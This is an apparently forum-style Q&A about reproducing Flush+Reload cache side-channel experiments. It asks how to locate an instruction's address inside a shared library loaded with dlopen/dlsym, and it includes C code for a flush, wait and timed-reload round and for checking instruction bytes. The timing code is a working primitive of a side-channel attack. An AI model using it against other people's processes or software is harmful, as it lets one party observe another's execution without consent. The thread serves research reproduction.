How to get the address of an instruction in a shared library?

Question

I want to reproduce some experiments from the Flush+Reload paper. The experiment has two threads, A and B, and a shared library c. Thread A evicts an instruction d in c from the cache with a flush instruction, waits for a while, and then reloads d. If the reload is fast, d was in the cache, which means thread B executed it while A was waiting. If the reload is slow, d had to be fetched from memory, which means B did not execute it during A's wait.
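For reference, one flush, wait, reload round as described above might look roughly like the sketch below. It assumes x86-64 with GCC or Clang; the names timed_load and flush_reload_round, the busy-wait loop, and the threshold parameter are illustrative and not taken from the paper. The threshold has to be calibrated on the target machine.

```c
#include <assert.h>
#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

/* Time a single load from addr, in TSC ticks. */
static uint64_t timed_load(const void *addr)
{
    unsigned int aux;
    assert(addr != NULL);
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    (void)*(const volatile unsigned char *)addr;  /* the reload */
    uint64_t end = __rdtscp(&aux);  /* rdtscp waits for the load to finish */
    _mm_lfence();
    return end - start;
}

/* One round: flush, wait, reload.
 * Returns 1 if the reload was faster than threshold (line was cached). */
static int flush_reload_round(const void *addr, uint64_t threshold,
                              unsigned long wait_iters)
{
    assert(addr != NULL);
    _mm_clflush(addr);  /* evict the cache line holding addr */
    _mm_mfence();
    for (volatile unsigned long i = 0; i < wait_iters; i++)
        ;  /* crude busy-wait standing in for "A waits for a while" */
    return timed_load(addr) < threshold;
}
```

Here addr would be the address of instruction d inside the mapped library, and a return value of 1 would suggest that B touched that cache line during the wait.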

I want to know how to get the address of an instruction in a shared library.

For example, I have a shared library with a function print, and I want the address of the instruction for a=a+1 in that function. With

gadget_module = dlopen("sym.so", RTLD_LAZY);
probe = (char *)dlsym(gadget_module, "print");  /* byte pointer, so probe+n advances n bytes */

I can get the address of the print function, but how do I get the address of a=a+1? Is it probe+n, and if so, what should n be? How can I verify that this address really is that instruction?

int a;

int print(){
    a=a+1;
    return a;
}
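As a rough illustration of the probe+n idea, the sketch below computes "start of function plus byte offset" through dlsym. The helper name insn_addr is hypothetical, and the offset has to come from a disassembly of the library (for example the print+N labels gdb shows). The arithmetic is done on a byte pointer, because on a char ** each +1 would advance by sizeof(char *) bytes rather than one byte.

```c
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>

/* Return the address byte_offset bytes past the start of symbol,
 * or NULL if the symbol cannot be resolved in handle. */
static const unsigned char *insn_addr(void *handle, const char *symbol,
                                      size_t byte_offset)
{
    assert(handle != NULL && symbol != NULL);
    /* Byte pointer, so the addition below is in units of one byte. */
    const unsigned char *base = (const unsigned char *)dlsym(handle, symbol);
    return base != NULL ? base + byte_offset : NULL;
}
```

With the names from the question, insn_addr(gadget_module, "print", n) would give the candidate address, where n is the offset read from the disassembly. On older glibc versions the program may need to be linked with -ldl.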

If your library comes with debug info, you can sift through it and find the offset of a particular line of code from the start of the function. Then it is a simple matter of adding that line offset to the start of the function (which you already have). — TCvD, Dec 03 '20 at 12:40
Thanks for your comment. How do I know the offset? And how do I verify that I am actually on that instruction? Is there a way to output the information of that instruction based on the address? — Gerrie, Dec 03 '20 at 12:43
As I said, you will have to parse (and understand) the debug info. And of course the library has to include it (debug info is part of the app or lib binary, stored in special sections). To verify that it is indeed a valid instruction, you must know what CPU you are on and then check whether the value at that location (function + offset) represents a valid CPU opcode. Also note that there is usually no 1:1 mapping between lines of C code and assembly; usually there are several assembly instructions for each line of C code. — TCvD, Dec 03 '20 at 12:46
When I run it under gdb, the print function starts at print+0 and the next assembly instruction is at print+4. So do I only need probe = (char *)dlsym(gadget_module, "print"); and is probe+4 then the address of that instruction? Is there a way to verify this in code? — Gerrie, Dec 03 '20 at 12:55
Depends on the CPU. With the Intel instruction set this is difficult because instructions have very different lengths. On ARM and PowerPC, instructions used to be 4 bytes long. To be really general, you need to know the CPU and its instruction set to be able to move to the next instruction and to verify that you are looking at an actual instruction, not just some gibberish. — TCvD, Dec 03 '20 at 13:04
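One way to check an address without writing an instruction decoder is to compare the bytes found there with the bytes a disassembler (for example objdump -d on the library) prints for the instruction. The sketch below is only an illustration; the helper names format_code_bytes and matches_encoding are made up here, and the expected bytes must be taken from the actual disassembly of the library being probed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Write the n bytes at addr into out as lowercase hex, e.g. "83 c0 01".
 * Returns the number of characters written, or -1 if out is too small. */
static int format_code_bytes(const void *addr, size_t n,
                             char *out, size_t out_size)
{
    const unsigned char *p = addr;
    size_t used = 0;
    assert(addr != NULL && out != NULL);
    if (out_size == 0)
        return -1;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        int w = snprintf(out + used, out_size - used,
                         i ? " %02x" : "%02x", p[i]);
        if (w < 0 || (size_t)w >= out_size - used)
            return -1;  /* output would be truncated */
        used += (size_t)w;
    }
    return (int)used;
}

/* Return 1 if the n bytes at addr equal the expected encoding. */
static int matches_encoding(const void *addr,
                            const unsigned char *expected, size_t n)
{
    assert(addr != NULL && expected != NULL);
    return memcmp(addr, expected, n) == 0;
}
```

As an example of the idea, on x86 the bytes 83 c0 01 encode add eax, 1. The instruction the compiler actually emits for a=a+1 will likely differ (a global a is usually updated through a memory operand), so the disassembly of the real library is the only reliable source for the expected bytes.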
